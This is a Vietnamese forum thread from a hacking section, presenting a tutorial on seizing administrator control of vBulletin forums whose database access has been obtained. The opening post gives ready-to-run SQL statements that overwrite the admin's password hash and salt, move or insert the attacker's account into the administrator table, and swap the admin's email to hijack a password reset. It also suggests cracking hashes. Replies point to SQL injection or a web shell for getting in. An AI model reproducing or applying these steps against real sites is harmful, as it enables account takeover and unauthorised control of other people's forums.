Có thể bạn quan tâm


Đang tải thanh công cụ tìm kiếm ...

Trang 1/3 123 cuốicuối
Hiện kết quả từ 1 tới 10 của 21

[Tut] Hướng dẫn chiếm quyền admin VBB trong data

Chủ đề được gửi trong chuyên mục Hacking bởi ITqb


  1. 03-07-2010, 10:58 PM

    [Tut] Hướng dẫn chiếm quyền admin VBB trong data

    cách 1: change pass admin trong data
    cách 2: change adminpermissions
    cách 3: forget pass admin

    Yêu cầu:
    Có được info data của victim bao gồm:
    Code:
    $config['Database']['dbname'] = 'forum';
    $config['MasterServer']['servername'] = 'localhost';
    $config['MasterServer']['username'] = 'root';
    $config['MasterServer']['password'] = '123456';
    Hiểu biết sơ về câu lệnh SQL

    Đầu tiên ta tôi sẽ nói cho các bạn biết về các dạng mã hóa của một vài forum thông dụng hiện nay như:

    Code:
    1. phpBB : md5($pass) //ko dùng salt
    2. VBB    : md5(md5($pass).$salt)
    3. IPB     : md5(md5($salt).md5($pass))
    Với
    -$Pass là mật khẩu ban đầu.
    -$salt là 3 kí tự ngẫu nhiên mà forum tạo ra. (Mục đích: cá nhân quá mật khẩu của member trong db).


    OK băt đầu thôi:

    Cách 1: change pass admin trong data


    Việc đầu tiên ta cần làm là tạo 1 nick trong 4rum victim
    Vi dụ nick là hacker pass: 123456
    Sau đó connet vào data qua shell
    Ta dung lệnh :

    Code:
    Select * from user
    Với lệnh trên thì ta có thể xem dc tất cả user trên 4rum
    Nếu 4rum victim có số lượng thành viện cở hơn 3k thì ta dung lệnh

    Code:
    Select password , salt  from user where username='hacker'
    Ta dc

    Code:
    Pass md5 : 5cc70df698ca01c3adb396a08b4873ad
    Salt: ?`Y
    Q: Tại sao lại phải select from user
    A: Ta cần lấy pass mã hóa md5 + salt qua nick mới reg sau đó copy lưu lại.

    Tips: bạn có thể lưu lại một số password đơn giản như: 123456, abcdef, 123abc để dễ dàng cho công việc hacking lần sau.

    Q:Tiếp tục theo ta xác định ID của nick admin site victim. Nếu trong 4rum victim có nhiều admin ma ta ko bít admin nào có quyền superadmin hay rootadmin, hay admin đã thay đổi userid của rootadmin hay superadmin thì làm sao
    A:Bay vào file config.php và tìm các dòng sau


    Code:
    $config['SpecialUsers']['canviewadminlog']
    $config['SpecialUsers']['canpruneadminlog']
    $config['SpecialUsers']['superadministrators']
    Tìm xem userid của thằng rootadmin hay superadmin là báo nhiêu (Thưởng thì mặt đinh định là userid=1 là rootadmin)

    Ta tiếp tục dùung lệnh
    Code:
    Select password , salt  from user where userid=1
    Lấy được pass md5 & salt
    Vi dụ:
    Code:
     Pass md5 : eaf1672523371b7736282bbfc2c8b2ac
    Salt : 2/D
    Tiếp ta dùng lệnh
    Update cú pháp thì các bạn có thể tìm hiểu thêm trên google
    Code:
     Update user set password=’pass md5 của nick mới reg’ ,salt=’ salt của nick mới reg’ where userid=’userid của admin”
    Câu lệnh hoàn chỉnh như sau:

    Code:
    Update user set password=’ 5cc70df698ca01c3adb396a08b4873ad’ ,salt=’?`Y’ where userid=’1”
    5cc70df698ca01c3adb396a08b4873ad là pass md5 của nick hacker
    ?`Y là salt của nick hacker
    1 là userid của thằng admin

    Tác dụng của câu lệnh này là
    Update pass của thằng admin thành pass của nick mình
    ở đây nick hacker có pass là 123456
    Để kiểm tra kết quả ta vào 4rum victim đăng nhập bằng nick của thằng admin với password là 123456

    Cách 2: Thay phân quyền trong table administrator

    ở cách 2 thì không dài và rồm rà như cách 1 .Ta cũng connet vào data victim

    dùng lệnh
    Code:
    update user set usergroupid =’6’ where username=’hacker’
    tác dung câu lệnh này là nâng quyền cho nick hacker vào group admin
    với câu lệnh này nick hacker mới chỉ là admin bình thường … vẫn chưa có toàn quyền trên site victim .
    ta tiếp tực dung lệnh
    Code:
     select * from administrator
    với câu lệnh này ta xem dc các userid , adminpermissions, cssprefs còn những table khác ta ko quan tâm
    ở đây lại chia ra thêm 2 cách nhỏ:

    2.a) Dùng lệnh update

    Code:
    Update administrator set userid=’userid của nick hacker’ where userid=’userid của admin’
    Vi dụ: userid của nick hacker là 5 và userid của nick admin là 1 ta dung lệnh như sau

    Code:
    Update administrator set userid=’5’ where userid=’1’
    Thế là nick hacker đã là admin có toàn quyền

    2.b) Dùng lệnh INSERT
    ở đây ta có info của table administrator như sau

    Code:
    userid : 1 
    adminpermissions : 491516
    navprefs : NULL
     cssprefs :vBulletin_3_CarbonFibre2'
    notes : NULL
    dismissednews: NULL
     languageid : 0
    câu lệnh INSERT như sau
    Code:
    INSERT  INTO `4rum`.`administrator` (`userid`, `adminpermissions`, `navprefs`, `cssprefs`, `notes`, `dismissednews`, `languageid`) VALUES ('5', '491516', NULL, ' vBulletin_3_CarbonFibre2', NULL, NULL, '0');
    Phân tích câu lệnh

    INSERT INTO `4rum`.`administrator` <== INSERT vào table administrator của database tên là 4rum.

    Code:
    (
    `userid` ,
    `adminpermissions` ,
    `navprefs` ,
    `cssprefs` ,
    `notes` ,
    `dismissednews` ,
    `languageid` 
    )
    VALUES (
    '5', '2345', NULL , ' vBulletin_3_CarbonFibre2', NULL , NULL , '0'   );
    <== INSERT colum userid là 5 , adminpermissions là 2345 , cssprefs là vBulletin_3_CarbonFibre2'


    Với câu lệnh này ta đã insert userid của nick hacker vào admin (có toàn quyền admin)
    (Nếu bạn nào ko hiểu thì có thể tim hiểu thêm trên google)
    Xong thử vào admincp của 4rum đăng nhập bằng nick hacker xem thế nào

    Cách 3: Forget pass admin

    Cách này thì đơn gian hơn 2 cách trên
    Cách thức như sau
    Vào 4rum victim đặng nhập bằng nick của admin …. Pass thì đánh đại đi
    Khi đăng nhâp sai VBB sẽ thông báo và xuất hiện phần nhập mail và lấy lại password
    http://victim/4rum/login.php?do=lostpw
    nhập email của thằng admin vào rồi nhấp ok
    sau đó vào data copy password mã hóa + sail
    bỏ vào tool passwordpro
    cho crack ở chế độ là số và ngồi đợi …
    nếu bạn nào ko muốn đợi thì làm cách này
    vào data
    update mail của thẳng admin thành mail của mình
    khi forget thì nhập mail của mình vào….
    Sau khi forget xong vào mail lấy pass

    Tut the end

    Theo X - Group
  2. 7 Thành viên dưới đây đã cảm ơn cho bài viết rất có ích của ITqb :

    Sơn Nguyễn (29-07-2010),lightness (29-07-2010),nguyenhung1121990 (04-07-2010),Nhỏ (23-09-2010),TùngBinCp (10-07-2011),Thiên Nhi (29-07-2010),tuandeptrai (06-09-2010)

  3. 04-07-2010, 11:41 PM

    [Tut] Hướng dẫn chiếm quyền admin VBB trong data

    sac đọc qua thấy đây là tut hướng dẫn mấy câu lệnh sql thui chứ ! điều đầu tiên là làm sao có file config! nếu có file này coi như có hết !

    Contact me:



  4. Thành viên dưới đây đã cám ơn bài viết này của huunam09 :

    Nhỏ (23-09-2010)

  5. 04-07-2010, 11:46 PM

    [Tut] Hướng dẫn chiếm quyền admin VBB trong data

    vấn đề là vào đc phpadmin or vào đc host để xem file config mới là khó chứ
    đã vào đc thì còn nói làm gì
    Giúp Mà Không Cảm Ơn Thì Lần Sau Đừng Hòng Giúp
  6. Thành viên dưới đây đã cám ơn bài viết này của Đinh Xuân Thường :

    Nhỏ (23-09-2010)

  7. 05-07-2010, 02:34 AM

    [Tut] Hướng dẫn chiếm quyền admin VBB trong data

    sac đọc qua thấy đây là tut hướng dẫn mấy câu lệnh sql thui chứ ! điều đầu tiên là làm sao có file config! nếu có file này coi như có hết !
    vấn đề là vào đc phpadmin or vào đc host để xem file config mới là khó chứ
    đã vào đc thì còn nói làm gì
    Thì tiêu đề đã nói rõ rồi mà, chiếm quyền admin trong data (tức là khi đã có data rồi) . Còn làm sao để có đc data thì dùng sql injection hoặc các bug khác để tìm lỗi kết hợp với local thôi chứ biết làm sao
  8. Thành viên dưới đây đã cám ơn bài viết này của ITqb :

    Nhỏ (23-09-2010)

  9. 05-07-2010, 08:34 AM

    [Tut] Hướng dẫn chiếm quyền admin VBB trong data

    svit chuyển hướng thành ug
    dịch vụ thiết kế web: http://www.thietkewebz.net
    một số web đã - đang xây dựng:
    http://poily.net
    http://asmehcm.com
    http://quankhong.com
    http://congtyxuatnhapkhau.com
    http://sangtaovietco.com
    http://larose-paris.com
  10. 29-07-2010, 03:49 PM

    [Tut] Hướng dẫn chiếm quyền admin VBB trong data

    Trích Nguyên văn bởi ITqb Xem bài viết
    Thì tiêu đề đã nói rõ rồi mà, chiếm quyền admin trong data (tức là khi đã có data rồi) . Còn làm sao để có đc data thì dùng sql injection hoặc các bug khác để tìm lỗi kết hợp với local thôi chứ biết làm sao
    ta vào đc host rùi thì cần éo j tools ta củng chiếm đc quyền
  11. Thành viên dưới đây đã cám ơn bài viết này của @kiss@ :

    Nhỏ (23-09-2010)

  12. 29-07-2010, 04:23 PM

    [Tut] Hướng dẫn chiếm quyền admin VBB trong data

    Cám ơn ông bạn về cái salt.
    tối qua mình xem cách mã hóa pass của nó.

    md5 2 lớp mật khẩu + salt

    Vào MySQL mình thấy SALT.

    Trong câu truy cấn login nó + pass và SALT tự tạo. mới mã hóa.


    Nhưng còn cái COOKIE_SALT là gì huynh.

    nó md5(md5($vbulletin->userinfo['password'] . COOKIE_SALT)):

    ở cái function verify_password_forum. trong file function_login.php

    Mình nhớ câu so sánh pass như thế.

    cái COOKIE_SALT tìm hoài ko thấy.
    |
    |


    Tăng view zing mp3 ( > 500 k view/ngày )
    http://sinhvienit.net/forum/ban-view...ay.284373.html
  13. 29-07-2010, 04:26 PM

    [Tut] Hướng dẫn chiếm quyền admin VBB trong data

    đọc từ đầu thì có nghĩa là: server đầu tiên phải có shell, thứ 2 là phải local được và thứ ba là có bug sql inject chứ gì?
    Không có cả 3 thì nghỉ?
    Bạn hack thử cái forum của mình xem...http://dacminhm.co.cc/forum
    Cứ hack khỏi ngại..cái forum đó mình tạo ra để thử code thôi..
  14. 29-07-2010, 05:29 PM

    [Tut] Hướng dẫn chiếm quyền admin VBB trong data

    có ai biết cách lấy info data bảo caí, để em bảo mật ấy mà!.
    P/S Tieugiang : thằng phpbb2 mới md5(pass) còn phpbb3 thì khác, bác có biết kiểu gì ko.
  15. 29-07-2010, 05:31 PM

    [Tut] Hướng dẫn chiếm quyền admin VBB trong data

    Trích Nguyên văn bởi channhoibong Xem bài viết
    có ai biết cách lấy info data bảo caí, để em bảo mật ấy mà!.
    P/S Tieugiang : thằng phpbb2 mới md5(pass) còn phpbb3 thì khác, bác có biết kiểu gì ko.

    Mình nói VBB bạn ơi

    nó so sánh
    md5(md5($vbulletin->userinfo['password'] . COOKIE_SALT)):

    Lật file nó ra và tìm là thấy bạn àhh.

    Ko hiểu
    COOKIE_SALT) nó lấy từ đâu để cộng với password

    ko thấy nó tạo
    COOKIE_SALT nó ở đâu.

    ----> BỔ SUNG BÀI VIẾT<----
    ---------------------------------------------------------------
    Ngoài ra nó còn cái lấy SALT nhưng ko phải COOKIE_SALT
    SALT này ở trong data.
    |
    |


    Tăng view zing mp3 ( > 500 k view/ngày )
    http://sinhvienit.net/forum/ban-view...ay.284373.html
  16. Thành viên dưới đây đã cám ơn bài viết này của tieugiang94 :

    Nhỏ (23-09-2010)

Trang 1/3 123 cuốicuối

Facebook comment

Thông tin đề tài

Users Browsing this Thread

Hiện đang có 1 người đang xem bài viết này. (0 thành viên và 1 khách)

Visitors found this page by searching for:

cách chiếm quyền admin website

lenh chiem quyen admin trong mang lan

huong dan cach bo quyen admin

hướng dẫn chiếm quyền admin VBB trong data

lenh truy cap quyen admin

huong dan cap quyen admin cho member

hướng dẫn truy cập quyền admin website

dung sqli chiem quyen admin

hack quyen admin bang loi SQL INJECTION

chiếm quyền admin vbb

Hd Bug admin phpBB

cach chiem quyen admin web bi loi sql injection

dang nhap quyen admin vao dien dan bi refresh lien tuchack quyền admin máy chủ trong mạng LANdanh quyen administrator tren mot trang webban nick vbb 3hương dẫn bảo mật máy bằng quyeenf adaminhd set nick admin cho hosthd trong hack admhướng dẫn set quyền user trong forum phpbbhack quyen admin win 7cách set quyền admin trong forumvao quyen admin cua trang webhuong dan set quyen admin win 7huong dan tao 1 victim